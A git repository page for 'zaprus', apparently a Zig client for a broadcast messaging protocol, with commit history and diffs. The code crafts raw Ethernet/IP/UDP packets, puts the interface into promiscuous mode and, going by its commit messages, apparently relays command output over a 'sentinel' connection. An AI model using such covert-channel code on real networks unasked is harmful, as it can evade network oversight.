57 Commits

Author SHA1 Message Date
f554e7a3bb Kill process after 10 messages or 3 seconds 2026-01-25 23:49:09 -05:00
19c2b78d1d Connection by default 2026-01-25 01:14:02 -05:00
3c5f34d5c2 Set timeouts instead of sleeping 2026-01-24 21:14:40 -05:00
09152377ed Fix reconnection
Was failing to reconnect due to trying to reuse the same socket that
already had a BPF filter on it.
2026-01-24 20:14:22 -05:00
c3b17f8267 Better error handling and debug logging 2026-01-24 19:17:43 -05:00
cf365673b5 Retry timing
Wait 2 minutes if trying for initial connect. Wait 10 minutes if
connection to sentinel has timed out
2026-01-24 18:54:01 -05:00
16fd65e281 Add C API 2026-01-24 17:16:06 -05:00
8965a4d5d4 Skip empty stdin 2026-01-24 14:42:37 -05:00
ba8a84c478 Don't create dangling references
Apparently things die at the end of blk scopes.
2026-01-24 14:34:19 -05:00
19d4e88c33 Chunk stdin 2026-01-24 13:11:02 -05:00
3577d538b8 Chunk relay input
This makes it possible to chunk connection command output to a relay
command to direct it somewhere like discord
2026-01-24 11:28:18 -05:00
fc9c5bcd5d Chunk messages to 1000 byte payloads 2026-01-24 11:28:18 -05:00
157afa13b1 Fix checksum issue 2026-01-24 10:40:33 -05:00
a81c4b3175 Calculate IPv4 checksum header
This was causing an issue because virtual networks were dropping packets
without this being set
2026-01-23 23:05:20 -05:00
43f7497424 Simplify tagged union 2026-01-23 22:17:21 -05:00
213a01afc8 Implemented client and connection 2026-01-21 22:25:20 -05:00
067a11ab23 Move RawSocket and clean it up 2026-01-20 23:21:35 -05:00
6db4204bf0 Set don't fragment, and use random id 2026-01-20 22:08:10 -05:00
def8454012 Reconnect on timeout 2026-01-19 19:05:03 -05:00
4106679262 things are SOOOO good.... 2026-01-19 17:55:54 -05:00
01f44949f1 base64 encode payload and don't require connection playload 2026-01-19 17:16:29 -05:00
19126f1203 Attach BPF filter to get all the saprus messages 2026-01-19 17:04:08 -05:00
fec468c508 Complete handshake badly 2026-01-19 15:06:25 -05:00
9359fefdf7 Add real RawSocket deinit 2026-01-19 14:45:29 -05:00
f969d097ab Detect interface and use real mac 2026-01-19 14:43:44 -05:00
cc765dc91b Start adding connection message 2026-01-19 14:08:27 -05:00
abf2cfb366 use disc as default dest 2026-01-19 13:00:28 -05:00
c66b95bf89 Write relay message to the network 2026-01-19 12:59:21 -05:00
d7dedd243e construct full message 2026-01-19 12:30:08 -05:00
9947c21b4c Arrange bytes for relay 2026-01-19 12:12:23 -05:00
8a53c7366a 2026-01-18 17:20:44 -05:00
a33a96dafd start doing packet stuff 2026-01-17 21:38:23 -05:00
1a817df18d Mostly done with parsing and serializing messages 2026-01-17 16:06:47 -05:00
0d9c0c33fa 2026-01-14 19:34:35 -05:00
b3f1b00510 start porting to 0.16.0 2026-01-11 18:06:36 -05:00
7a8874ea6a doing some shenanigans
trying to start writing my own function to do raw socket connections
2026-01-10 21:17:46 -05:00
b39603522f 2025-11-14 14:47:56 -05:00
fc329d1064 2025-10-13 13:28:41 -04:00
3abe3095e6 Remove prints 2025-10-12 21:40:23 -04:00
d6da3cd31b IT'S RIGHT 2025-10-12 21:13:42 -04:00
fe166d2106 Start breaking out net logic to NetWriter 2025-10-12 18:05:34 -04:00
439ee00444 Simplify RawSocketWriter
Does not need to use an allocator anymor.
Just uses the internal buffer properly.
2025-10-12 18:02:56 -04:00
0da7bbda5b Cleanup and use random mac 2025-10-12 14:16:57 -04:00
b06cb6dada it works well! 2025-09-23 16:22:57 -04:00
b8313e4fa4 2025-09-23 15:01:12 -04:00
b5efbd6e16 Write ether headers properly 2025-09-23 14:16:55 -04:00
30243db5c9 2025-09-23 13:33:17 -04:00
c673401c2a Use writer instead of RawSocket in Client 2025-09-09 22:30:31 -04:00
74b0c9ef1f Use 0.15.1 for application 2025-09-09 20:19:48 -04:00
0778889af5 Upgrade deps to 0.15.1 2025-09-09 17:32:59 -04:00
56b6b8a386 Use Client as var type instead of singleton 2025-05-11 13:52:42 -04:00
14ed0bc3f3 Fix issue returning stack pointer 2025-05-11 13:40:55 -04:00
c72503fce6 Fix extra bytes in connection message. 2025-05-11 13:40:23 -04:00
373dbebc8c Add broadcast initial interest using raw sockets
Use this from the relay message
2025-05-11 11:40:15 -04:00
cde289d648 Update gatorcat dep and use bytes for broadcast message
The latter is helpful for the lifetime of the message.
2025-05-11 10:12:26 -04:00
716fb466fa Remove allocation for messages 2025-05-10 21:46:53 -04:00
583f9d8b8f Add comments and fix tests
Also added networkBytesAsValue and restored bytesAsValue.
These are useful for treating the bytes from the network directly as a Message.
Otherwise, the init function would overwrite the packet type and length to be correct.
I would like the message handling to fail if the message body is incorrect.
2025-05-10 21:46:53 -04:00
11 changed files with 1108 additions and 482 deletions

182
build.zig
View File

@@ -1,72 +1,129 @@
const std = @import("std"); const std = @import("std");
// Although this function looks imperative, note that its job is to // Although this function looks imperative, it does not perform the build
// declaratively construct a build graph that will be executed by an external // directly and instead it mutates the build graph (`b`) that will be then
// runner. // executed by an external runner. The functions in `std.Build` implement a DSL
// for defining build steps and express dependencies between them, allowing the
// build runner to parallelize the build automatically (and the cache system to
// know when a step doesn't need to be re-run).
pub fn build(b: *std.Build) void { pub fn build(b: *std.Build) void {
// Standard target options allows the person running `zig build` to choose // Standard target options allow the person running `zig build` to choose
// what target to build for. Here we do not override the defaults, which // what target to build for. Here we do not override the defaults, which
// means any target is allowed, and the default is native. Other options // means any target is allowed, and the default is native. Other options
// for restricting supported target set are available. // for restricting supported target set are available.
const target = b.standardTargetOptions(.{}); const target = b.standardTargetOptions(.{});
// Standard optimization options allow the person running `zig build` to select // Standard optimization options allow the person running `zig build` to select
// between Debug, ReleaseSafe, ReleaseFast, and ReleaseSmall. Here we do not // between Debug, ReleaseSafe, ReleaseFast, and ReleaseSmall. Here we do not
// set a preferred release mode, allowing the user to decide how to optimize. // set a preferred release mode, allowing the user to decide how to optimize.
const optimize = b.standardOptimizeOption(.{}); const optimize = b.standardOptimizeOption(.{});
// It's also possible to define more custom flags to toggle optional features
// of this build script using `b.option()`. All defined flags (including
// target and optimize options) will be listed when running `zig build --help`
// in this directory.
const lib_mod = b.createModule(.{ // This creates a module, which represents a collection of source files alongside
// some compilation options, such as optimization mode and linked system libraries.
// Zig modules are the preferred way of making Zig code available to consumers.
// addModule defines a module that we intend to make available for importing
// to our consumers. We must give it a name because a Zig package can expose
// multiple modules and consumers will need to be able to specify which
// module they want to access.
const mod = b.addModule("zaprus", .{
// The root source file is the "entry point" of this module. Users of
// this module will only be able to access public declarations contained
// in this file, which means that if you have declarations that you
// intend to expose to consumers that were defined in other files part
// of this module, you will have to make sure to re-export them from
// the root file.
.root_source_file = b.path("src/root.zig"), .root_source_file = b.path("src/root.zig"),
// Later on we'll use this module as the root module of a test executable
// which requires us to specify a target.
.target = target, .target = target,
.optimize = optimize,
}); });
// We will also create a module for our other entry point, 'main.zig'. // Create static library
const exe_mod = b.createModule(.{
// `root_source_file` is the Zig "entry point" of the module. If a module
// only contains e.g. external object files, you can make this `null`.
// In this case the main source file is merely a path, however, in more
// complicated build scripts, this could be a generated file.
.root_source_file = b.path("src/main.zig"),
.target = target,
.optimize = optimize,
});
lib_mod.addImport("network", b.dependency("network", .{}).module("network"));
lib_mod.addImport("gatorcat", b.dependency("gatorcat", .{}).module("gatorcat"));
exe_mod.addImport("zaprus", lib_mod);
exe_mod.addImport("clap", b.dependency("clap", .{}).module("clap"));
const lib = b.addLibrary(.{ const lib = b.addLibrary(.{
.linkage = .static,
.name = "zaprus", .name = "zaprus",
.root_module = lib_mod, .root_module = b.createModule(.{
.root_source_file = b.path("src/c_api.zig"),
.target = target,
.optimize = optimize,
.link_libc = true,
.imports = &.{
.{ .name = "zaprus", .module = mod },
},
}),
}); });
b.installArtifact(lib); b.installArtifact(lib);
lib.installHeader(b.path("include/zaprus.h"), "zaprus.h");
// This creates another `std.Build.Step.Compile`, but this one builds an executable // Here we define an executable. An executable needs to have a root module
// rather than a static library. // which needs to expose a `main` function. While we could add a main function
// to the module defined above, it's sometimes preferable to split business
// logic and the CLI into two separate modules.
//
// If your goal is to create a Zig library for others to use, consider if
// it might benefit from also exposing a CLI tool. A parser library for a
// data serialization format could also bundle a CLI syntax checker, for example.
//
// If instead your goal is to create an executable, consider if users might
// be interested in also being able to embed the core functionality of your
// program in their own executable in order to avoid the overhead involved in
// subprocessing your CLI tool.
//
// If neither case applies to you, feel free to delete the declaration you
// don't need and to put everything under a single module.
const exe = b.addExecutable(.{ const exe = b.addExecutable(.{
.name = "zaprus", .name = "zaprus",
.root_module = exe_mod, .root_module = b.createModule(.{
// b.createModule defines a new module just like b.addModule but,
// unlike b.addModule, it does not expose the module to consumers of
// this package, which is why in this case we don't have to give it a name.
.root_source_file = b.path("src/main.zig"),
// Target and optimization levels must be explicitly wired in when
// defining an executable or library (in the root module), and you
// can also hardcode a specific target for an executable or library
// definition if desireable (e.g. firmware for embedded devices).
.target = target,
.optimize = optimize,
// List of modules available for import in source files part of the
// root module.
.imports = &.{
// Here "zaprus" is the name you will use in your source code to
// import this module (e.g. `@import("zaprus")`). The name is
// repeated because you are allowed to rename your imports, which
// can be extremely useful in case of collisions (which can happen
// importing modules from different packages).
.{ .name = "zaprus", .module = mod },
},
}),
}); });
// This declares intent for the executable to be installed into the // This declares intent for the executable to be installed into the
// standard location when the user invokes the "install" step (the default // install prefix when running `zig build` (i.e. when executing the default
// step when running `zig build`). // step). By default the install prefix is `zig-out/` but can be overridden
// by passing `--prefix` or `-p`.
b.installArtifact(exe); b.installArtifact(exe);
// This *creates* a Run step in the build graph, to be executed when another // This creates a top level step. Top level steps have a name and can be
// step is evaluated that depends on it. The next line below will establish // invoked by name when running `zig build` (e.g. `zig build run`).
// such a dependency. // This will evaluate the `run` step rather than the default step.
const run_cmd = b.addRunArtifact(exe); // For a top level step to actually do something, it must depend on other
// steps (e.g. a Run step, as we will see in a moment).
const run_step = b.step("run", "Run the app");
// By making the run step depend on the install step, it will be run from the // This creates a RunArtifact step in the build graph. A RunArtifact step
// invokes an executable compiled by Zig. Steps will only be executed by the
// runner if invoked directly by the user (in the case of top level steps)
// or if another step depends on it, so it's up to you to define when and
// how this Run step will be executed. In our case we want to run it when
// the user runs `zig build run`, so we create a dependency link.
const run_cmd = b.addRunArtifact(exe);
run_step.dependOn(&run_cmd.step);
// By making the run step depend on the default step, it will be run from the
// installation directory rather than directly from within the cache directory. // installation directory rather than directly from within the cache directory.
// This is not necessary, however, if the application depends on other installed
// files, this ensures they will be present and in the expected location.
run_cmd.step.dependOn(b.getInstallStep()); run_cmd.step.dependOn(b.getInstallStep());
// This allows the user to pass arguments to the application in the build // This allows the user to pass arguments to the application in the build
@@ -75,21 +132,42 @@ pub fn build(b: *std.Build) void {
run_cmd.addArgs(args); run_cmd.addArgs(args);
} }
// This creates a build step. It will be visible in the `zig build --help` menu, // Creates an executable that will run `test` blocks from the provided module.
// and can be selected like this: `zig build run` // Here `mod` needs to define a target, which is why earlier we made sure to
// This will evaluate the `run` step rather than the default, which is "install". // set the releative field.
const run_step = b.step("run", "Run the app"); const mod_tests = b.addTest(.{
run_step.dependOn(&run_cmd.step); .root_module = mod,
const exe_unit_tests = b.addTest(.{
.root_module = exe_mod,
}); });
const run_exe_unit_tests = b.addRunArtifact(exe_unit_tests); // A run step that will run the test executable.
const run_mod_tests = b.addRunArtifact(mod_tests);
// Similar to creating the run step earlier, this exposes a `test` step to // Creates an executable that will run `test` blocks from the executable's
// the `zig build --help` menu, providing a way for the user to request // root module. Note that test executables only test one module at a time,
// running the unit tests. // hence why we have to create two separate ones.
const test_step = b.step("test", "Run unit tests"); const exe_tests = b.addTest(.{
test_step.dependOn(&run_exe_unit_tests.step); .root_module = exe.root_module,
});
// A run step that will run the second test executable.
const run_exe_tests = b.addRunArtifact(exe_tests);
// A top level step for running all tests. dependOn can be called multiple
// times and since the two run steps do not depend on one another, this will
// make the two of them run in parallel.
const test_step = b.step("test", "Run tests");
test_step.dependOn(&run_mod_tests.step);
test_step.dependOn(&run_exe_tests.step);
// Just like flags, top level steps are also listed in the `--help` menu.
//
// The Zig build system is entirely implemented in userland, which means
// that it cannot hook into private compiler APIs. All compilation work
// orchestrated by the build system will result in other Zig compiler
// subcommands being invoked with the right flags defined. You can observe
// these invocations when one fails (or you pass a flag to increase
// verbosity) to validate assumptions and diagnose problems.
//
// Lastly, the Zig build system is relatively simple and self-contained,
// and reading its source code will allow you to master it.
} }

View File

@@ -10,7 +10,7 @@
// This is a [Semantic Version](https://semver.org/). // This is a [Semantic Version](https://semver.org/).
// In a future version of Zig it will be used for package deduplication. // In a future version of Zig it will be used for package deduplication.
.version = "0.0.0", .version = "0.1.0",
// Together with name, this represents a globally unique package // Together with name, this represents a globally unique package
// identifier. This field is generated by the Zig toolchain when the // identifier. This field is generated by the Zig toolchain when the
@@ -28,27 +28,14 @@
// Tracks the earliest Zig version that the package considers to be a // Tracks the earliest Zig version that the package considers to be a
// supported use case. // supported use case.
.minimum_zig_version = "0.14.0", .minimum_zig_version = "0.16.0",
// This field is optional. // This field is optional.
// Each dependency must either provide a `url` and `hash`, or a `path`. // Each dependency must either provide a `url` and `hash`, or a `path`.
// `zig build --fetch` can be used to fetch all dependencies of a package, recursively. // `zig build --fetch` can be used to fetch all dependencies of a package, recursively.
// Once all dependencies are fetched, `zig build` no longer requires // Once all dependencies are fetched, `zig build` no longer requires
// internet connectivity. // internet connectivity.
.dependencies = .{ .dependencies = .{},
.network = .{
.url = "https://github.com/ikskuh/zig-network/archive/c76240d2240711a3dcbf1c0fb461d5d1f18be79a.zip",
.hash = "network-0.1.0-AAAAAOwlAQAQ6zKPUrsibdpGisxld9ftUKGdMvcCSpaj",
},
.clap = .{
.url = "git+https://github.com/Hejsil/zig-clap?ref=0.10.0#e47028deaefc2fb396d3d9e9f7bd776ae0b2a43a",
.hash = "clap-0.10.0-oBajB434AQBDh-Ei3YtoKIRxZacVPF1iSwp3IX_ZB8f0",
},
.gatorcat = .{
.url = "git+https://github.com/kj4tmp/gatorcat#bb1847f6c95852e7a0ec8c07870a948c171d5f98",
.hash = "gatorcat-0.3.2-WcrpTf1mBwDrmPaIhKCfLJO064v8Sjjn7DBq4CKZSgHH",
},
},
.paths = .{ .paths = .{
"build.zig", "build.zig",
"build.zig.zon", "build.zig.zon",

33
include/zaprus.h Normal file
View File

@@ -0,0 +1,33 @@
#ifndef ZAPRUS_H
#define ZAPRUS_H
#include <stdint.h>
#include <stdlib.h>
typedef void* zaprus_client;
typedef void* zaprus_connection;
// Returns NULL if there was an error.
zaprus_client zaprus_init_client(void);
void zaprus_deinit_client(zaprus_client client);
// Returns 0 on success, else returns 1.
int zaprus_client_send_relay(zaprus_client client, const char* payload, size_t payload_len, const char dest[4]);
// Returns NULL if there was an error.
// Caller should call zaprus_deinit_connection when done with the connection.
zaprus_connection zaprus_connect(zaprus_client client, const char* payload, size_t payload_len);
void zaprus_deinit_connection(zaprus_connection connection);
// Capacity is the maximum length of the output buffer.
// out_len is modified to specify how much of the capacity is used by the response.
// Blocks until the next message is available, or returns 1 if the underlying socket times out.
// Returns 0 on success, else returns 1.
int zaprus_connection_next(zaprus_connection connection, char *out, size_t capacity, size_t *out_len);
// Returns 0 on success, else returns 1.
int zaprus_connection_send(zaprus_connection connection, const char *payload, size_t payload_len);
#endif // ZAPRUS_H

View File

@@ -1,152 +1,146 @@
const base64Enc = std.base64.Base64Encoder.init(std.base64.standard_alphabet_chars, '='); const base64_enc = std.base64.standard.Encoder;
const base64Dec = std.base64.Base64Decoder.init(std.base64.standard_alphabet_chars, '='); const base64_dec = std.base64.standard.Decoder;
var rand: ?Random = null; const Client = @This();
pub fn init() !void { const max_message_size = 2048;
var prng = Random.DefaultPrng.init(blk: {
var seed: u64 = undefined; pub const max_payload_len = RawSocket.max_payload_len;
try posix.getrandom(mem.asBytes(&seed));
break :blk seed; socket: RawSocket,
});
rand = prng.random(); pub fn init() !Client {
try network.init(); const socket: RawSocket = try .init();
return .{
.socket = socket,
};
} }
pub fn deinit() void { pub fn deinit(self: *Client) void {
network.deinit(); self.socket.deinit();
self.* = undefined;
} }
fn broadcastSaprusMessage(msg: *SaprusMessage, udp_port: u16) !void { pub fn sendRelay(self: *Client, io: Io, payload: []const u8, dest: [4]u8) !void {
if (false) { const io_source: std.Random.IoSource = .{ .io = io };
var foo: gcat.nic.RawSocket = try .init("enp7s0"); // /proc/net/dev const rand = io_source.interface();
defer foo.deinit();
}
const msg_bytes = msg.asBytes();
try msg.networkFromNativeEndian();
defer msg.nativeFromNetworkEndian() catch unreachable;
var sock = try network.Socket.create(.ipv4, .udp); var headers: EthIpUdp = .{
defer sock.close(); .src_mac = self.socket.mac,
.ip = .{
try sock.setBroadcast(true); .id = rand.int(u16),
.src_addr = 0, //rand.int(u32),
// Bind to 0.0.0.0:0 .dst_addr = @bitCast([_]u8{ 255, 255, 255, 255 }),
const bind_addr = network.EndPoint{ .len = undefined,
.address = network.Address{ .ipv4 = network.Address.IPv4.any }, },
.port = 0, .udp = .{
.src_port = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)),
.dst_port = 8888,
.len = undefined,
},
}; };
const dest_addr = network.EndPoint{ const relay: SaprusMessage = .{
.address = network.Address{ .ipv4 = network.Address.IPv4.broadcast }, .relay = .{
.port = udp_port, .dest = .fromBytes(&dest),
.payload = payload,
},
}; };
try sock.bind(bind_addr); var relay_buf: [max_message_size - (@bitSizeOf(EthIpUdp) / 8)]u8 = undefined;
const relay_bytes = relay.toBytes(&relay_buf);
headers.setPayloadLen(relay_bytes.len);
_ = try sock.sendTo(dest_addr, msg_bytes); var msg_buf: [max_message_size]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf);
msg_w.writeAll(&headers.toBytes()) catch unreachable;
msg_w.writeAll(relay_bytes) catch unreachable;
const full_msg = msg_w.buffered();
try self.socket.send(full_msg);
} }
pub fn sendRelay(payload: []const u8, dest: [4]u8, allocator: Allocator) !void { pub fn connect(self: Client, io: Io, payload: []const u8) !SaprusConnection {
const msg_bytes = try allocator.alignedAlloc( const io_source: std.Random.IoSource = .{ .io = io };
u8, const rand = io_source.interface();
@alignOf(SaprusMessage),
try SaprusMessage.lengthForPayloadLength(
.relay,
base64Enc.calcSize(payload.len),
),
);
defer allocator.free(msg_bytes);
const msg: *SaprusMessage = .init(.relay, msg_bytes);
const relay = (try msg.getSaprusTypePayload()).relay; var headers: EthIpUdp = .{
relay.dest = dest; .src_mac = self.socket.mac,
_ = base64Enc.encode(relay.getPayload(), payload); .ip = .{
.id = rand.int(u16),
try broadcastSaprusMessage(msg, 8888); .src_addr = 0, //rand.int(u32),
} .dst_addr = @bitCast([_]u8{ 255, 255, 255, 255 }),
.len = undefined,
fn randomPort() u16 { },
var p: u16 = 0; .udp = .{
if (rand) |r| { .src_port = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)),
p = r.intRangeAtMost(u16, 1024, 65000); .dst_port = 8888,
} else unreachable; .len = undefined,
},
return p;
}
pub fn sendInitialConnection(payload: []const u8, initial_port: u16, allocator: Allocator) !*SaprusMessage {
const dest_port = randomPort();
const msg_bytes = try allocator.alignedAlloc(
u8,
@alignOf(SaprusMessage),
try SaprusMessage.lengthForPayloadLength(
.connection,
base64Enc.calcSize(payload.len),
),
);
const msg: *SaprusMessage = .init(.connection, msg_bytes);
const connection = (try msg.getSaprusTypePayload()).connection;
connection.src_port = initial_port;
connection.dest_port = dest_port;
_ = base64Enc.encode(connection.getPayload(), payload);
try broadcastSaprusMessage(msg, 8888);
return msg;
}
pub fn connect(payload: []const u8, allocator: Allocator) !?SaprusConnection {
var initial_port: u16 = 0;
if (rand) |r| {
initial_port = r.intRangeAtMost(u16, 1024, 65000);
} else unreachable;
var initial_conn_res: ?*SaprusMessage = null;
var sock = try network.Socket.create(.ipv4, .udp);
defer sock.close();
// Bind to 255.255.255.255:8888
const bind_addr = network.EndPoint{
.address = network.Address{ .ipv4 = network.Address.IPv4.broadcast },
.port = 8888,
}; };
// timeout 1s // udp dest port should not be 8888 after first
try sock.setReadTimeout(1 * std.time.us_per_s); const udp_dest_port = rand.intRangeAtMost(u16, 9000, std.math.maxInt(u16));
try sock.bind(bind_addr); var connection: SaprusMessage = .{
.connection = .{
.src = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)),
.dest = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)),
.seq = undefined,
.id = undefined,
.payload = payload,
},
};
const msg = try sendInitialConnection(payload, initial_port, allocator); log.debug("Setting bpf filter to port {}", .{connection.connection.src});
defer allocator.free(msg.asBytes()); self.socket.attachSaprusPortFilter(connection.connection.src) catch |err| {
log.err("Failed to set port filter: {t}", .{err});
return err;
};
log.debug("bpf set", .{});
var response_buf: [4096]u8 align(@alignOf(SaprusMessage)) = undefined; var connection_buf: [2048]u8 = undefined;
_ = try sock.receive(&response_buf); // Ignore message that I sent. var connection_bytes = connection.toBytes(&connection_buf);
const len = try sock.receive(&response_buf); headers.setPayloadLen(connection_bytes.len);
std.debug.print("response bytes: {x}\n", .{response_buf[0..len]}); log.debug("Building full message", .{});
initial_conn_res = SaprusMessage.init(.connection, response_buf[0..len]); var msg_buf: [2048]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf);
msg_w.writeAll(&headers.toBytes()) catch unreachable;
msg_w.writeAll(connection_bytes) catch unreachable;
var full_msg = msg_w.buffered();
log.debug("Built full message. Sending message", .{});
// Complete handshake after awaiting response try self.socket.send(full_msg);
try broadcastSaprusMessage(msg, randomPort()); var res_buf: [4096]u8 = undefined;
if (false) { log.debug("Awaiting handshake response", .{});
return initial_conn_res.?; // Ignore response from sentinel, just accept that we got one.
} _ = try self.socket.receive(&res_buf);
return null;
headers.udp.dst_port = udp_dest_port;
headers.ip.id = rand.int(u16);
headers.setPayloadLen(connection_bytes.len);
log.debug("Building final handshake message", .{});
msg_w.end = 0;
msg_w.writeAll(&headers.toBytes()) catch unreachable;
msg_w.writeAll(connection_bytes) catch unreachable;
full_msg = msg_w.buffered();
try self.socket.send(full_msg);
return .init(self.socket, headers, connection);
} }
const RawSocket = @import("./RawSocket.zig");
const SaprusMessage = @import("message.zig").Message; const SaprusMessage = @import("message.zig").Message;
const SaprusConnection = @import("Connection.zig"); const SaprusConnection = @import("Connection.zig");
const EthIpUdp = @import("./EthIpUdp.zig").EthIpUdp;
const std = @import("std"); const std = @import("std");
const Random = std.Random; const Io = std.Io;
const posix = std.posix; const Writer = std.Io.Writer;
const mem = std.mem; const log = std.log;
const network = @import("network");
const gcat = @import("gatorcat");
const Allocator = mem.Allocator;

View File

@@ -0,0 +1,61 @@
socket: RawSocket,
headers: EthIpUdp,
connection: SaprusMessage,
const Connection = @This();
pub fn init(socket: RawSocket, headers: EthIpUdp, connection: SaprusMessage) Connection {
return .{
.socket = socket,
.headers = headers,
.connection = connection,
};
}
pub fn next(self: Connection, io: Io, buf: []u8) ![]const u8 {
_ = io;
log.debug("Awaiting connection message", .{});
const res = try self.socket.receive(buf);
log.debug("Received {} byte connection message", .{res.len});
const msg: SaprusMessage = try .parse(res[42..]);
const connection_res = msg.connection;
log.debug("Payload was {s}", .{connection_res.payload});
return connection_res.payload;
}
pub fn send(self: *Connection, io: Io, buf: []const u8) !void {
const io_source: std.Random.IoSource = .{ .io = io };
const rand = io_source.interface();
log.debug("Sending connection message", .{});
self.connection.connection.payload = buf;
var connection_bytes_buf: [2048]u8 = undefined;
const connection_bytes = self.connection.toBytes(&connection_bytes_buf);
self.headers.ip.id = rand.int(u16);
self.headers.setPayloadLen(connection_bytes.len);
var msg_buf: [2048]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf);
try msg_w.writeAll(&self.headers.toBytes());
try msg_w.writeAll(connection_bytes);
const full_msg = msg_w.buffered();
try self.socket.send(full_msg);
log.debug("Sent {} byte connection message", .{full_msg.len});
}
const std = @import("std");
const Io = std.Io;
const Writer = std.Io.Writer;
const log = std.log;
const SaprusMessage = @import("./message.zig").Message;
const EthIpUdp = @import("./EthIpUdp.zig").EthIpUdp;
const RawSocket = @import("./RawSocket.zig");

93
src/EthIpUdp.zig Normal file
View File

@@ -0,0 +1,93 @@
pub const EthIpUdp = packed struct(u336) { // 42 bytes * 8 bits = 336
// --- UDP (Last in memory, defined first for LSB->MSB) ---
udp: packed struct {
checksum: u16 = 0,
len: u16,
dst_port: u16,
src_port: u16,
},
// --- IP ---
ip: packed struct {
dst_addr: u32,
src_addr: u32,
header_checksum: u16 = 0,
protocol: u8 = 17, // udp
ttl: u8 = 0x40,
// fragment_offset (13 bits) + flags (3 bits) = 16 bits
// In Big Endian, flags are the high bits of the first byte.
// To have flags appear first in the stream, define them last here.
fragment_offset: u13 = 0,
flags: packed struct(u3) {
reserved: u1 = 0,
dont_fragment: u1 = 1,
more_fragments: u1 = 0,
} = .{},
id: u16,
len: u16,
tos: u8 = undefined,
// ip_version (4 bits) + ihl (4 bits) = 8 bits
// To have version appear first (high nibble), define it last.
ihl: u4 = 5,
ip_version: u4 = 4,
},
// --- Ethernet ---
eth_type: u16 = std.os.linux.ETH.P.IP,
src_mac: @Vector(6, u8),
dst_mac: @Vector(6, u8) = @splat(0xff),
pub fn toBytes(self: @This()) [336 / 8]u8 {
var res: [336 / 8]u8 = undefined;
var w: Writer = .fixed(&res);
w.writeStruct(self, .big) catch unreachable;
return res;
}
pub fn setPayloadLen(self: *@This(), len: usize) void {
self.ip.len = @intCast(len + (@bitSizeOf(@TypeOf(self.udp)) / 8) + (@bitSizeOf(@TypeOf(self.ip)) / 8));
// Zero the checksum field before calculation
self.ip.header_checksum = 0;
// Serialize IP header to big-endian bytes
var ip_bytes: [@bitSizeOf(@TypeOf(self.ip)) / 8]u8 = undefined;
var w: Writer = .fixed(&ip_bytes);
w.writeStruct(self.ip, .big) catch unreachable;
// Calculate checksum over serialized bytes
self.ip.header_checksum = onesComplement16(&ip_bytes);
self.udp.len = @intCast(len + (@bitSizeOf(@TypeOf(self.udp)) / 8));
}
};
fn onesComplement16(data: []const u8) u16 {
var sum: u32 = 0;
// Process pairs of bytes as 16-bit words
var i: usize = 0;
while (i + 1 < data.len) : (i += 2) {
const word: u16 = (@as(u16, data[i]) << 8) | data[i + 1];
sum += word;
}
// Handle odd byte if present
if (data.len % 2 == 1) {
sum += @as(u32, data[data.len - 1]) << 8;
}
// Fold 32-bit sum to 16 bits
while (sum >> 16 != 0) {
sum = (sum & 0xFFFF) + (sum >> 16);
}
// Return ones' complement
return ~@as(u16, @truncate(sum));
}
const std = @import("std");
const Writer = std.Io.Writer;

167
src/RawSocket.zig Normal file
View File

@@ -0,0 +1,167 @@
const RawSocket = @This();
const is_debug = builtin.mode == .Debug;
fd: i32,
sockaddr_ll: std.posix.sockaddr.ll,
mac: [6]u8,
pub const max_payload_len = 1000;
const Ifconf = extern struct {
ifc_len: i32,
ifc_ifcu: extern union {
ifcu_buf: ?[*]u8,
ifcu_req: ?[*]std.os.linux.ifreq,
},
};
pub fn init() !RawSocket {
const socket: i32 = std.math.cast(i32, std.os.linux.socket(std.os.linux.AF.PACKET, std.os.linux.SOCK.RAW, 0)) orelse return error.SocketError;
if (socket < 0) return error.SocketError;
var ifreq_storage: [16]std.os.linux.ifreq = undefined;
var ifc = Ifconf{
.ifc_len = @sizeOf(@TypeOf(ifreq_storage)),
.ifc_ifcu = .{ .ifcu_req = &ifreq_storage },
};
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFCONF, @intFromPtr(&ifc)) != 0) {
return error.NicError;
}
const count = @divExact(ifc.ifc_len, @sizeOf(std.os.linux.ifreq));
// Get the first non loopback interface
var ifr = for (ifreq_storage[0..@intCast(count)]) |*ifr| {
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFFLAGS, @intFromPtr(ifr)) == 0) {
if (ifr.ifru.flags.LOOPBACK) continue;
break ifr;
}
} else return error.NoInterfaceFound;
// 2. Get Interface Index
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFINDEX, @intFromPtr(ifr)) != 0) {
return error.NicError;
}
const ifindex: i32 = ifr.ifru.ivalue;
// 3. Get Real MAC Address
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFHWADDR, @intFromPtr(ifr)) != 0) {
return error.NicError;
}
var mac: [6]u8 = ifr.ifru.hwaddr.data[0..6].*;
if (builtin.cpu.arch.endian() == .little) std.mem.reverse(u8, &mac);
// 4. Set Flags (Promiscuous/Broadcast)
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFFLAGS, @intFromPtr(ifr)) != 0) {
return error.NicError;
}
ifr.ifru.flags.BROADCAST = true;
ifr.ifru.flags.PROMISC = true;
if (std.os.linux.ioctl(socket, std.os.linux.SIOCSIFFLAGS, @intFromPtr(ifr)) != 0) {
return error.NicError;
}
const sockaddr_ll = std.mem.zeroInit(std.posix.sockaddr.ll, .{
.family = std.posix.AF.PACKET,
.ifindex = ifindex,
.protocol = std.mem.nativeToBig(u16, @as(u16, std.os.linux.ETH.P.IP)),
});
const bind_ret = std.os.linux.bind(socket, @ptrCast(&sockaddr_ll), @sizeOf(@TypeOf(sockaddr_ll)));
if (bind_ret != 0) return error.BindError;
return .{
.fd = socket,
.sockaddr_ll = sockaddr_ll,
.mac = mac,
};
}
pub fn setTimeout(self: *RawSocket, sec: isize, usec: i64) !void {
const timeout: std.os.linux.timeval = .{ .sec = sec, .usec = usec };
const timeout_ret = std.os.linux.setsockopt(self.fd, std.os.linux.SOL.SOCKET, std.os.linux.SO.RCVTIMEO, @ptrCast(&timeout), @sizeOf(@TypeOf(timeout)));
if (timeout_ret != 0) return error.SetTimeoutError;
}
pub fn deinit(self: *RawSocket) void {
_ = std.os.linux.close(self.fd);
